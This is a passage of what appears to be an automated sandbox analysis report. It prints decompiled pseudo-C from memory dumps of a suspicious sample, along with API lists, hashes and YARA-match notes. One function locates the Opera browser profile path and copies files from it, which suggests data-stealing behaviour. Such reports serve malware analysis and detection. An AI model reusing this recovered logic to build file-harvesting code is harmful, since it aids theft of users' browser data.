                                                                                				_push(_t303 - 0x2c);
                                                                                				_push(_t303 - 0x10c);
                                                                                				_t274 = _t303 + 0x10;
                                                                                				_t141 = E0040E2D6(_t224, _t303 + 0x10, _t285, _t307);
                                                                                				_t305 = _t304 - 0x14;
                                                                                				 *((char*)(_t303 - 4)) = 4;
                                                                                				_t272 = _t303 + 0x48;
                                                                                				 *((intOrPtr*)(_t303 - 0x1fc)) = _t305;
                                                                                				E0040D39B(_t141, _t141, _t305, _t303 + 0x48);
                                                                                				E0041778D(_t303 - 0x20c, _t303 + 0x10, _t285, _t307);
                                                                                				_t286 = 0;
                                                                                				 *((char*)(_t303 - 4)) = 6;
                                                                                				E00402C34(_t303 - 0x10c, 1, 0);
                                                                                				_t145 =  *((intOrPtr*)(_t303 - 0x208));
                                                                                				_t235 =  *((intOrPtr*)(_t303 - 0x20c));
                                                                                				 *((intOrPtr*)(_t303 - 0x1fc)) = _t145;
                                                                                				 *((intOrPtr*)(_t303 - 0x1f4)) = _t235;
                                                                                				_t308 = _t235 - _t145;
                                                                                				if(_t235 != _t145) {
                                                                                					do {
                                                                                						E0040E243(_t303 - 0x48,  *((intOrPtr*)(_t303 - 0x1f4)));
                                                                                						 *((char*)(_t303 - 4)) = 7;
                                                                                						 *(_t303 - 0x1f0) = E00417554(_t303 - 0x48, _t272, _t303 - 0x160);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0xf0);
                                                                                						 *((char*)(_t303 - 4)) = 8;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t286, _t308);
                                                                                						 *((char*)(_t303 - 4)) = 9;
                                                                                						_t164 = E0040D431( *(_t303 - 0x1f0), _t303 - 0x1b4);
                                                                                						 *((char*)(_t303 - 4)) = 0xa;
                                                                                						 *((intOrPtr*)(_t303 - 0x8c)) = _t286;
                                                                                						 *((intOrPtr*)(_t303 - 0x88)) = 0xf;
                                                                                						 *((char*)(_t303 - 0x9c)) = 0;
                                                                                						E0040CFB8(_t303 - 0x9c, _t164);
                                                                                						E00402C34(_t303 - 0x1b4, 1, 0);
                                                                                						E00402C34(_t303 - 0xf0, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x160, 1, 0);
                                                                                						_t171 = E00417554(_t303 - 0x48, _t272, _t303 - 0x80);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0x64);
                                                                                						 *((char*)(_t303 - 4)) = 0xf;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t171, _t308);
                                                                                						 *((char*)(_t303 - 4)) = 0x10;
                                                                                						_t176 = E0040D431(_t171, _t303 - 0xb8);
                                                                                						 *((char*)(_t303 - 4)) = 0x11;
                                                                                						_t177 = E004175C4(_t176, _t303 - 0xd4);
                                                                                						if(_t177[0xa] >= 8) {
                                                                                							_t177 =  *_t177;
                                                                                						}
                                                                                						_t178 = GetFileAttributesW(_t177);
                                                                                						if(_t178 == 0xffffffff || (_t178 & 0x00000010) != 0) {
                                                                                							_t59 = _t303 - 0x1f0;
                                                                                							 *_t59 =  *(_t303 - 0x1f0) & 0x00000000;
                                                                                							__eflags =  *_t59;
                                                                                						} else {
                                                                                							 *(_t303 - 0x1f0) = 1;
                                                                                						}
                                                                                						E00403960(0, _t303 - 0xd4, 1);
                                                                                						E00402C34(_t303 - 0xb8, 1, 0);
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x80, 1, 0);
                                                                                						_t281 =  *((intOrPtr*)(_t303 - 0x1f8));
                                                                                						if( *(_t303 - 0x1f0) != 0) {
                                                                                							_t68 = _t281 + 0x1c;
                                                                                							 *_t68 =  *((intOrPtr*)(_t281 + 0x1c)) + 1;
                                                                                							_t313 =  *_t68;
                                                                                						}
                                                                                						_push("\\");
                                                                                						_push(_t303 - 0x64);
                                                                                						_t184 = E0040D337(1, _t281, 0, _t313);
                                                                                						 *((char*)(_t303 - 4)) = 0x12;
                                                                                						_t185 = E0040D39B(_t184, _t184, _t303 - 0x80, _t303 + 0x2c);
                                                                                						_t305 = _t305 + 0x10;
                                                                                						_t314 = _t185[0x14] - 0x10;
                                                                                						if(_t185[0x14] >= 0x10) {
                                                                                							_t185 =  *_t185;
                                                                                						}
                                                                                						CreateDirectoryA(_t185, 0);
                                                                                						E00402C34(_t303 - 0x80, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						_t191 = E004175C4(_t303 + 0x2c, _t303 - 0x128);
                                                                                						 *((char*)(_t303 - 4)) = 0x13;
                                                                                						E004175C4(_t281, _t303 - 0x17c);
                                                                                						 *((char*)(_t303 - 4)) = 0x14;
                                                                                						E0040E32E(_t272);
                                                                                						_t272 = _t303 - 0x1d0;
                                                                                						 *((char*)(_t303 - 4)) = 0x15;
                                                                                						E0040E34B(_t191, _t303 - 0x1d0);
                                                                                						 *((char*)(_t303 - 4)) = 0x16;
                                                                                						_t198 = E0040E32E(_t303 - 0x1d0);
                                                                                						 *((char*)(_t303 - 4)) = 0x17;
                                                                                						_t293 = E0040E2B0(_t303 - 0x144, _t303 - 0x48, _t198, _t303 - 0x48);
                                                                                						 *((char*)(_t303 - 4)) = 0x18;
                                                                                						 *(_t303 - 0x1f0) = E00417554(_t303 - 0x48, _t303 - 0x1d0, _t303 - 0xd4);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0xb8);
                                                                                						 *((char*)(_t303 - 4)) = 0x19;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t293, _t314);
                                                                                						 *((char*)(_t303 - 4)) = 0x1a;
                                                                                						_t208 = E0040D431( *(_t303 - 0x1f0), _t303 - 0x64);
                                                                                						 *((char*)(_t303 - 4)) = 0x1b;
                                                                                						_t209 = E004175C4(_t208, _t303 - 0x80);
                                                                                						if(_t293[0xa] >= 8) {
                                                                                							_t293 =  *_t293;
                                                                                						}
                                                                                						if(_t209[0xa] >= 8) {
                                                                                							_t209 =  *_t209;
                                                                                						}
                                                                                						CopyFileW(_t209, _t293, 1);
                                                                                						_t274 = 0;
                                                                                						E00403960(0, _t303 - 0x80, 1);
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						E00402C34(_t303 - 0xb8, 1, 0);
                                                                                						E00402C34(_t303 - 0xd4, 1, 0);
                                                                                						E00403960(0, _t303 - 0x144, 1);
                                                                                						E00403960(0, _t303 - 0x198, 1);
                                                                                						E00403960(0, _t303 - 0x1d0, 1);
                                                                                						E00403960(0, _t303 - 0x1ec, 1);
                                                                                						E00403960(0, _t303 - 0x17c, 1);
                                                                                						E00403960(0, _t303 - 0x128, 1);
                                                                                						E00402C34(_t303 - 0x9c, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 6;
                                                                                						E00403960(0, _t303 - 0x48, 1);
                                                                                						 *((intOrPtr*)(_t303 - 0x1f4)) =  *((intOrPtr*)(_t303 - 0x1f4)) + 0x1c;
                                                                                						_t286 = 0;
                                                                                					} while ( *((intOrPtr*)(_t303 - 0x1f4)) !=  *((intOrPtr*)(_t303 - 0x1fc)));
                                                                                				}
                                                                                				_t146 =  *((intOrPtr*)(_t303 - 0x20c));
                                                                                				if( *((intOrPtr*)(_t303 - 0x20c)) != _t286) {
                                                                                					E0040E28F(_t146,  *((intOrPtr*)(_t303 - 0x208)));
                                                                                					_push( *((intOrPtr*)(_t303 - 0x20c)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				 *((intOrPtr*)(_t303 - 0x20c)) = _t286;
                                                                                				 *((intOrPtr*)(_t303 - 0x208)) = _t286;
                                                                                				 *((intOrPtr*)(_t303 - 0x204)) = _t286;
                                                                                				E00402C34(_t303 - 0x2c, 1, _t286);
                                                                                				E00402C34(_t303 + 0x10, 1, _t286);
                                                                                				E00402C34(_t303 + 0x2c, 1, _t286);
                                                                                				E00402C34(_t303 + 0x48, 1, _t286);
                                                                                				return E00421A61(1, _t274, _t286);
                                                                                			}
























                                                                                0x0040d875
                                                                                0x0040d87a
                                                                                0x0040d87e
                                                                                0x0040d88c
                                                                                0x0040d896
                                                                                0x0040d89d
                                                                                0x0040d8ac
                                                                                0x0040d8b9
                                                                                0x0040d8c6
                                                                                0x0040d8ca
                                                                                0x0040d8d6
                                                                                0x0040d8e0
                                                                                0x0040d8e4
                                                                                0x0040d8e8
                                                                                0x0040d8ec
                                                                                0x0040d8fd
                                                                                0x0040d901
                                                                                0x0040d90d
                                                                                0x0040d911
                                                                                0x0040d91a
                                                                                0x0040d91c
                                                                                0x0040d91c
                                                                                0x0040d91f
                                                                                0x0040d928
                                                                                0x0040d936
                                                                                0x0040d936
                                                                                0x0040d936
                                                                                0x0040d92e
                                                                                0x0040d92e
                                                                                0x0040d92e
                                                                                0x0040d946
                                                                                0x0040d955
                                                                                0x0040d95f
                                                                                0x0040d969
                                                                                0x0040d96d
                                                                                0x0040d972
                                                                                0x0040d97e
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d986
                                                                                0x0040d98b
                                                                                0x0040d98c
                                                                                0x0040d99b
                                                                                0x0040d99f
                                                                                0x0040d9a4
                                                                                0x0040d9a7
                                                                                0x0040d9ab
                                                                                0x0040d9ad
                                                                                0x0040d9ad
                                                                                0x0040d9b1
                                                                                0x0040d9bc
                                                                                0x0040d9c6
                                                                                0x0040d9ca
                                                                                0x0040d9d9
                                                                                0x0040d9e9
                                                                                0x0040d9ed
                                                                                0x0040d9f8
                                                                                0x0040d9fc
                                                                                0x0040da05
                                                                                0x0040da0b
                                                                                0x0040da0f
                                                                                0x0040da1a
                                                                                0x0040da1e
                                                                                0x0040da2f
                                                                                0x0040da39
                                                                                0x0040da45
                                                                                0x0040da4e
                                                                                0x0040da57
                                                                                0x0040da5e
                                                                                0x0040da62
                                                                                0x0040da66
                                                                                0x0040da78
                                                                                0x0040da7c
                                                                                0x0040da85
                                                                                0x0040da89
                                                                                0x0040da92
                                                                                0x0040da94
                                                                                0x0040da94
                                                                                0x0040da9a
                                                                                0x0040da9c
                                                                                0x0040da9c
                                                                                0x0040daa1
                                                                                0x0040daa8
                                                                                0x0040daad
                                                                                0x0040dab9
                                                                                0x0040dac6
                                                                                0x0040dad3
                                                                                0x0040dadf
                                                                                0x0040daeb
                                                                                0x0040daf7
                                                                                0x0040db03
                                                                                0x0040db0f
                                                                                0x0040db1b
                                                                                0x0040db28
                                                                                0x0040db31
                                                                                0x0040db35
                                                                                0x0040db3a
                                                                                0x0040db47
                                                                                0x0040db49
                                                                                0x0040d823
                                                                                0x0040db55
                                                                                0x0040db5d
                                                                                0x0040db65
                                                                                0x0040db6a
                                                                                0x0040db70
                                                                                0x0040db75
                                                                                0x0040db7b
                                                                                0x0040db81
                                                                                0x0040db87
                                                                                0x0040db8d
                                                                                0x0040db97
                                                                                0x0040dba1
                                                                                0x0040dbab
                                                                                0x0040dbb7

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040D76C
                                                                                • __wgetenv.LIBCMT ref: 0040D7A3
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,\Opera Software\,?,00000000), ref: 004175EF
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414013), ref: 0041761E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D91F
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000001,00000000,?,?,?,?,00000000), ref: 0040D9B1
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000001,00000000,00000001,00000000,?,?,?,?,00000000), ref: 0040DAA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWide$AttributesCopyCreateDirectoryH_prolog3___wgetenv
                                                                                • String ID:
                                                                                • API String ID: 2407594625-0
                                                                                • Opcode ID: 710e04b7528abd2d55df9c60ba74e900898103ac92fb7dd225bbdc96110562f3
                                                                                • Instruction ID: 4745099863267b5fc23faa9ac42b4c35ddfa69ba583e7bcb1b132b18a76a5a50
                                                                                • Opcode Fuzzy Hash: 710e04b7528abd2d55df9c60ba74e900898103ac92fb7dd225bbdc96110562f3
                                                                                • Instruction Fuzzy Hash: 1CD17272C0525C9BCB25EBA9CD45ADEBBB8AF15308F1044EFE40973181DA785B48CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 432fdcbd26440fa49d8c2f0321fafb819c2af6934c27eb33582434f78dbb0314
                                                                                • Instruction ID: d10bbab52d5977bf36daf602d55a69bd52c19fad85295bf8e5a6530a426baa24
                                                                                • Opcode Fuzzy Hash: 432fdcbd26440fa49d8c2f0321fafb819c2af6934c27eb33582434f78dbb0314
                                                                                • Instruction Fuzzy Hash: C9B180B5E00109DFCB08DFACD8919EEB7B5BB88314F24C659E929A7355D730A905CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E0042040D(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                				signed int _v8;
                                                                                				char* _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t82;
                                                                                				char _t89;
                                                                                				signed int _t96;
                                                                                				signed int _t98;
                                                                                				signed int _t101;
                                                                                				signed int _t104;
                                                                                				signed int _t108;
                                                                                				signed int _t109;
                                                                                				char* _t110;
                                                                                				signed int _t120;
                                                                                				signed int _t123;
                                                                                				signed int _t124;
                                                                                				signed int _t125;
                                                                                				signed int _t126;
                                                                                				void* _t127;
                                                                                
                                                                                				_t110 = _a4;
                                                                                				_t108 = _a8;
                                                                                				_t123 = _a12;
                                                                                				_v12 = _t110;
                                                                                				_v8 = _t108;
                                                                                				if(_t123 == 0 || _a16 == 0) {
                                                                                					L5:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t131 = _t110;
                                                                                					if(_t110 != 0) {
                                                                                						_t126 = _a20;
                                                                                						__eflags = _t126;
                                                                                						if(_t126 == 0) {
                                                                                							L9:
                                                                                							__eflags = _t108 - 0xffffffff;
                                                                                							if(_t108 != 0xffffffff) {
                                                                                								_t82 = E00427E30(_t110, 0, _t108);
                                                                                								_t127 = _t127 + 0xc;
                                                                                							}
                                                                                							__eflags = _t126;
                                                                                							if(__eflags == 0) {
                                                                                								goto L3;
                                                                                							} else {
                                                                                								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                                                                								if(__eflags > 0) {
                                                                                									goto L3;
                                                                                								}
                                                                                								L13:
                                                                                								_t124 = _t123 * _a16;
                                                                                								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                								_v20 = _t124;
                                                                                								_t109 = _t124;
                                                                                								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                									_v16 = 0x1000;
                                                                                								} else {
                                                                                									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                								}
                                                                                								__eflags = _t124;
                                                                                								if(_t124 == 0) {
                                                                                									L40:
                                                                                									return _a16;
                                                                                								} else {
                                                                                									do {
                                                                                										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                											L24:
                                                                                											__eflags = _t109 - _v16;
                                                                                											if(_t109 < _v16) {
                                                                                												_t89 = E00429FED(_t109, _t124, _t126);
                                                                                												__eflags = _t89 - 0xffffffff;
                                                                                												if(_t89 == 0xffffffff) {
                                                                                													L45:
                                                                                													return (_t124 - _t109) / _a12;
                                                                                												}
                                                                                												__eflags = _v8;
                                                                                												if(_v8 == 0) {
                                                                                													L41:
                                                                                													__eflags = _a8 - 0xffffffff;
                                                                                													if(__eflags != 0) {
                                                                                														E00427E30(_a4, 0, _a8);
                                                                                													}
                                                                                													 *((intOrPtr*)(E00423E5B(__eflags))) = 0x22;
                                                                                													L4:
                                                                                													E00424EDB();
                                                                                													goto L5;
                                                                                												}
                                                                                												_v12 = _v12 + 1;
                                                                                												 *_v12 = _t89;
                                                                                												_t109 = _t109 - 1;
                                                                                												_t65 =  &_v8;
                                                                                												 *_t65 = _v8 - 1;
                                                                                												__eflags =  *_t65;
                                                                                												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                												goto L39;
                                                                                											}
                                                                                											__eflags = _v16;
                                                                                											if(_v16 == 0) {
                                                                                												_t96 = 0x7fffffff;
                                                                                												__eflags = _t109 - 0x7fffffff;
                                                                                												if(_t109 <= 0x7fffffff) {
                                                                                													_t96 = _t109;
                                                                                												}
                                                                                											} else {
                                                                                												__eflags = _t109 - 0x7fffffff;
                                                                                												if(_t109 <= 0x7fffffff) {
                                                                                													_t50 = _t109 % _v16;
                                                                                													__eflags = _t50;
                                                                                													_t120 = _t50;
                                                                                													_t101 = _t109;
                                                                                												} else {
                                                                                													_t120 = 0x7fffffff % _v16;
                                                                                													_t101 = 0x7fffffff;
                                                                                												}
                                                                                												_t96 = _t101 - _t120;
                                                                                											}
                                                                                											__eflags = _t96 - _v8;
                                                                                											if(_t96 > _v8) {
                                                                                												goto L41;
                                                                                											} else {
                                                                                												_push(_t96);
                                                                                												_push(_v12);
                                                                                												_push(E00426CDE(_t126));
                                                                                												_t98 = E0042A95D(_t109, _t124, _t126, __eflags);
                                                                                												_t127 = _t127 + 0xc;
                                                                                												__eflags = _t98;
                                                                                												if(_t98 == 0) {
                                                                                													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                                                                													goto L45;
                                                                                												}
                                                                                												__eflags = _t98 - 0xffffffff;
                                                                                												if(_t98 == 0xffffffff) {
                                                                                													L44:
                                                                                													_t72 = _t126 + 0xc;
                                                                                													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                                                                													__eflags =  *_t72;
                                                                                													goto L45;
                                                                                												}
                                                                                												_v12 = _v12 + _t98;
                                                                                												_t109 = _t109 - _t98;
                                                                                												_v8 = _v8 - _t98;
                                                                                												goto L39;
                                                                                											}
                                                                                										}
                                                                                										_t104 =  *(_t126 + 4);
                                                                                										__eflags = _t104;
                                                                                										if(__eflags == 0) {
                                                                                											goto L24;
                                                                                										}
                                                                                										if(__eflags < 0) {
                                                                                											goto L44;
                                                                                										}
                                                                                										_t125 = _t109;
                                                                                										__eflags = _t109 - _t104;
                                                                                										if(_t109 >= _t104) {
                                                                                											_t125 = _t104;
                                                                                										}
                                                                                										__eflags = _t125 - _v8;
                                                                                										if(_t125 > _v8) {
                                                                                											goto L41;
                                                                                										} else {
                                                                                											E00420674(_v12, _v8,  *_t126, _t125);
                                                                                											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                                                                											 *_t126 =  *_t126 + _t125;
                                                                                											_v12 = _v12 + _t125;
                                                                                											_t109 = _t109 - _t125;
                                                                                											_t127 = _t127 + 0x10;
                                                                                											_v8 = _v8 - _t125;
                                                                                											_t124 = _v20;
                                                                                										}
                                                                                										L39:
                                                                                										__eflags = _t109;
                                                                                									} while (_t109 != 0);
                                                                                									goto L40;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t82 = (_t82 | 0xffffffff) / _t123;
                                                                                						__eflags = _a16 - _t82;
                                                                                						if(_a16 <= _t82) {
                                                                                							goto L13;
                                                                                						}
                                                                                						goto L9;
                                                                                					}
                                                                                					L3:
                                                                                					 *((intOrPtr*)(E00423E5B(_t131))) = 0x16;
                                                                                					goto L4;
                                                                                				}
                                                                                			}



























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 4048096073-0
                                                                                • Opcode ID: 1aa14f87bd80fa15905a971588af030c7160ad9f87238f269029738f561264b5
                                                                                • Instruction ID: d185e40525eed09795b002153564981a3491385e146d8054c892fe8d75a71f3f
                                                                                • Opcode Fuzzy Hash: 1aa14f87bd80fa15905a971588af030c7160ad9f87238f269029738f561264b5
                                                                                • Instruction Fuzzy Hash: D0510630B00724EFDB20DF69A84465FB7F5AF40324F64866BE82492292D778DE91CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00414818(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
                                                                                				void* _t54;
                                                                                				intOrPtr _t56;
                                                                                				signed int _t59;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t71;
                                                                                				void* _t89;
                                                                                				intOrPtr _t103;
                                                                                				signed int _t106;
                                                                                				intOrPtr _t107;
                                                                                				signed int _t108;
                                                                                				void* _t109;
                                                                                
                                                                                				_t106 = __esi;
                                                                                				_push(0x2c);
                                                                                				E004219DE(E00435F11, __ebx, __edi, __esi);
                                                                                				_t105 = __ecx;
                                                                                				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) == 0) {
                                                                                					L4:
                                                                                					__eflags =  *(_t105 + 0x54);
                                                                                					if( *(_t105 + 0x54) != 0) {
                                                                                						E00414E42(_t105);
                                                                                						__eflags =  *(_t105 + 0x44);
                                                                                						if(__eflags != 0) {
                                                                                							 *((intOrPtr*)(_t109 - 0x18)) = 0xf;
                                                                                							 *((intOrPtr*)(_t109 - 0x1c)) = 0;
                                                                                							 *((char*)(_t109 - 0x2c)) = 0;
                                                                                							 *((intOrPtr*)(_t109 - 4)) = 0;
                                                                                							_push( *(_t105 + 0x54));
                                                                                							_t54 = E0041FFE6(0, _t105, _t106, __eflags);
                                                                                							_t83 = 1;
                                                                                							while(1) {
                                                                                								_pop(_t89);
                                                                                								__eflags = _t54 - 0xffffffff;
                                                                                								if(_t54 == 0xffffffff) {
                                                                                									break;
                                                                                								}
                                                                                								_t107 = _t109 - 0x2c;
                                                                                								E0040D70E(_t83, _t89, _t107, _t109, _t54);
                                                                                								__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                								_t103 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                								_t56 = _t103;
                                                                                								if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                									_t56 = _t107;
                                                                                									_t103 = _t107;
                                                                                								}
                                                                                								_t106 =  *( *(_t105 + 0x44));
                                                                                								_t83 = _t109 - 0x34;
                                                                                								_t59 =  *((intOrPtr*)(_t106 + 0x10))(_t105 + 0x4c, _t103, _t56 +  *((intOrPtr*)(_t109 - 0x1c)), _t109 - 0x34, _t109 - 0x2d, _t109 - 0x2c, _t109 - 0x38);
                                                                                								__eflags = _t59;
                                                                                								if(_t59 < 0) {
                                                                                									break;
                                                                                								} else {
                                                                                									_t83 = 1;
                                                                                									__eflags = _t59 - 1;
                                                                                									if(_t59 <= 1) {
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x38)) - _t109 - 0x2d;
                                                                                										_t64 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                										if( *((intOrPtr*)(_t109 - 0x38)) != _t109 - 0x2d) {
                                                                                											__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                											if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                												_t64 = _t109 - 0x2c;
                                                                                											}
                                                                                											_t108 = _t64 -  *((intOrPtr*)(_t109 - 0x34)) +  *((intOrPtr*)(_t109 - 0x1c));
                                                                                											while(1) {
                                                                                												__eflags = _t108;
                                                                                												if(_t108 <= 0) {
                                                                                													break;
                                                                                												}
                                                                                												_push( *(_t105 + 0x54));
                                                                                												_t108 = _t108 - 1;
                                                                                												__eflags = _t108;
                                                                                												_push( *((char*)(_t108 +  *((intOrPtr*)(_t109 - 0x34)))));
                                                                                												E0041FAA3(_t83, _t105, _t108, _t108);
                                                                                											}
                                                                                											L32:
                                                                                											_t106 =  *(_t109 - 0x2d) & 0x000000ff;
                                                                                											L26:
                                                                                											E00402C34(_t109 - 0x2c, 1, 0);
                                                                                											L3:
                                                                                											return E00421A61(_t83, _t105, _t106);
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                										if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                											_t64 = _t109 - 0x2c;
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x34)) - _t64;
                                                                                										E00403EAE(_t109 - 0x2c, 0,  *((intOrPtr*)(_t109 - 0x34)) - _t64);
                                                                                										L23:
                                                                                										_push( *(_t105 + 0x54));
                                                                                										_t54 = E0041FFE6(_t83, _t105, _t106, __eflags);
                                                                                										continue;
                                                                                									}
                                                                                									__eflags = _t59 - 3;
                                                                                									if(_t59 != 3) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t109 - 0x1c)) - 1;
                                                                                									if(__eflags < 0) {
                                                                                										goto L23;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                									_t71 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                										_t71 = _t109 - 0x2c;
                                                                                									}
                                                                                									E00420674(_t109 - 0x2d, _t83, _t71, _t83);
                                                                                									goto L32;
                                                                                								}
                                                                                							}
                                                                                							__eflags = _t106;
                                                                                							goto L26;
                                                                                						}
                                                                                						_push( *(_t105 + 0x54));
                                                                                						_t51 = E0041FFE6(0, _t105, _t106, __eflags);
                                                                                						__eflags = _t51 - 0xffffffff;
                                                                                						if(_t51 == 0xffffffff) {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                					L5:
                                                                                					goto L3;
                                                                                				}
                                                                                				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))))) {
                                                                                					goto L4;
                                                                                				}
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                                                                				_t105 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) + 1;
                                                                                				goto L3;
                                                                                			}















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fgetc$H_prolog3_Xinvalid_argument_memcpy_sstd::_
                                                                                • String ID:
